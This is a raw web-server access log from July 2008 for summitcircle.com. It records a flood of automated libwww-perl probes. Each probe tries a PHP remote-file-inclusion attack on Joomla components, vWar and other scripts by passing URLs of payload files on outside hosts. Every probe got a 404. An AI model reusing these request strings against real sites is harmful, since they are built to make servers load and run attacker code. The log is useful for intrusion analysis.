62.141.56.49 - - [13/Jul/2008:17:55:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
205.234.252.183 - - [13/Jul/2008:17:55:28 -0700] "GET /logs/access_080210.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
62.141.56.49 - - [13/Jul/2008:17:55:42 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
75.0.18.81 - - [13/Jul/2008:17:55:48 -0700] "GET //include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.188.110.128 - - [13/Jul/2008:17:57:31 -0700] "GET //login.php?dir=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:58:03 -0700] "GET /logs/access_080526.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:17:58:08 -0700] "GET /logs/access_071008.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:17:58:23 -0700] "GET /logs/access_071029.log/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:17:58:23 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:17:58:24 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:59:07 -0700] "GET /logs/access_080414.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:59:08 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.62.145.42 - - [13/Jul/2008:17:59:10 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
200.24.193.42 - - [13/Jul/2008:17:59:46 -0700] "GET /logs/access_080210.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:00:22 -0700] "GET /logs/access_071029.log/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:00:22 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:00:22 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:00:30 -0700] "GET /logs/access_071112.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:01:39 -0700] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:01:44 -0700] "GET /logs/access_071231.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:01:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:02:07 -0700] "GET /logs/access_071029.log/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:02:08 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:02:08 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:02:36 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
80.190.131.43 - - [13/Jul/2008:18:02:49 -0700] "GET /logs//login.php?dir=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
80.190.131.43 - - [13/Jul/2008:18:02:49 -0700] "GET //login.php?dir=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
89.248.101.56 - - [13/Jul/2008:18:02:54 -0700] "GET /logs/access_071021.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:05 -0700] "GET /logs/access_080210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:03:21 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:03:21 -0700] "GET //components/errors.php?error=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:03:21 -0700] "GET /logs//components/errors.php?error=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.74.196.90 - - [13/Jul/2008:18:03:21 -0700] "GET /logs/access_070917.log//components/errors.php?error=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:56 -0700] "GET /logs/access_080210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:56 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:03:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:04:17 -0700] "GET /logs/access_080210.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:04:17 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:04:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:04:44 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
208.69.192.170 - - [13/Jul/2008:18:04:51 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
208.69.192.170 - - [13/Jul/2008:18:04:51 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
208.69.192.170 - - [13/Jul/2008:18:04:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:04:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
193.178.228.12 - - [13/Jul/2008:18:05:06 -0700] "GET /logs/access_071210.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [13/Jul/2008:18:05:06 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [13/Jul/2008:18:05:07 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [13/Jul/2008:18:05:18 -0700] "GET /logs/access_080210.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:05:31 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:05:35 -0700] "GET /logs/access_071022.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.86.237 - - [13/Jul/2008:18:05:48 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
195.19.6.245 - - [13/Jul/2008:18:06:49 -0700] "GET /logs/access_070813.log//shop/index.php?action=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
195.19.6.245 - - [13/Jul/2008:18:06:51 -0700] "GET //shop/index.php?action=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
195.19.6.245 - - [13/Jul/2008:18:06:52 -0700] "GET /logs//shop/index.php?action=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
77.232.68.17 - - [13/Jul/2008:18:06:54 -0700] "GET /logs//include.php?path[docroot]=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [13/Jul/2008:18:06:54 -0700] "GET //include.php?path[docroot]=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:08:24 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:08:24 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/access_080526.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/access_080526.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/access_071231.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.246.7.92 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/access_071231.log/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:08:26 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
195.19.6.245 - - [13/Jul/2008:18:08:46 -0700] "GET /logs/access_071021.log//shop/index.php?action=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
194.79.75.195 - - [13/Jul/2008:18:09:07 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:09 -0700] "GET /logs/access_071022.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:09 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:09 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:09:11 -0700] "GET /logs/index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
205.234.234.3 - - [13/Jul/2008:18:09:11 -0700] "GET /index2.php?x=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
66.109.30.182 - - [13/Jul/2008:18:09:12 -0700] "GET http://www.summitcircle.com/logs/access_070709.log HTTP/1.0" 200 131072 "-" "dvfuhp0lqcEdhke wgffvEncafpver dhy" "www.summitcircle.com"
69.72.144.162 - - [13/Jul/2008:18:09:13 -0700] "GET /logs/access_071112.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.72.144.162 - - [13/Jul/2008:18:09:13 -0700] "GET /index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.72.144.162 - - [13/Jul/2008:18:09:13 -0700] "GET /logs/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:16 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:16 -0700] "GET /logs/access_071022.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:16 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:36 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:36 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
69.27.110.65 - - [13/Jul/2008:18:09:36 -0700] "GET /logs/access_071231.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:38 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:38 -0700] "GET /logs/access_071231.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
207.58.170.49 - - [13/Jul/2008:18:09:38 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
69.72.144.162 - - [13/Jul/2008:18:09:50 -0700] "GET /logs/access_071029.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.232.71.106 - - [13/Jul/2008:18:10:19 -0700] "GET /index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.232.71.106 - - [13/Jul/2008:18:10:19 -0700] "GET /logs/access_071112.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.232.71.106 - - [13/Jul/2008:18:10:19 -0700] "GET /logs/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.91.250 - - [13/Jul/2008:18:10:35 -0700] "GET /logs/access_071112.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [13/Jul/2008:18:10:35 -0700] "GET /logs/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [13/Jul/2008:18:10:36 -0700] "GET /index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.232.71.106 - - [13/Jul/2008:18:10:54 -0700] "GET /logs/access_071029.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:18:10:58 -0700] "GET /logs/access_080526.log//errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:18:10:59 -0700] "GET //errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.176.106 - - [13/Jul/2008:18:10:59 -0700] "GET /logs//errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:18:11:10 -0700] "GET /logs/access_071210.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:18:11:11 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:18:11:11 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [13/Jul/2008:18:11:23 -0700] "GET /logs/access_080210.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
124.106.202.189 - - [13/Jul/2008:18:11:57 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.summitcircle.com"
124.106.202.189 - - [13/Jul/2008:18:11:59 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 327680 "http://search.yahoo.com/search;_ylt=A0oGklnNp3pIqXcAFhtXNyoA?p=192.168.18.18%2Fview.shtml.com&fr=slv8-msgr&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.summitcircle.com"
75.125.143.162 - - [13/Jul/2008:18:12:08 -0700] "GET /logs/sub.php?sub=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
75.125.143.162 - - [13/Jul/2008:18:12:08 -0700] "GET /sub.php?sub=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
62.244.71.72 - - [13/Jul/2008:18:12:20 -0700] "GET /logs/index2.php?x=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.244.71.72 - - [13/Jul/2008:18:12:20 -0700] "GET /index2.php?x=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.91.250 - - [13/Jul/2008:18:12:25 -0700] "GET /logs/access_071029.log/index.php?inc=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.188.110.128 - - [13/Jul/2008:18:12:55 -0700] "GET /logs/index.php?go=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.188.110.128 - - [13/Jul/2008:18:12:55 -0700] "GET /index.php?go=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.244.71.72 - - [13/Jul/2008:18:13:11 -0700] "GET /logs/index2.php?x=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.244.71.72 - - [13/Jul/2008:18:13:11 -0700] "GET /index2.php?x=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
75.125.143.162 - - [13/Jul/2008:18:13:13 -0700] "GET /logs/index2.php?x=http://zonzia.net/partner/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
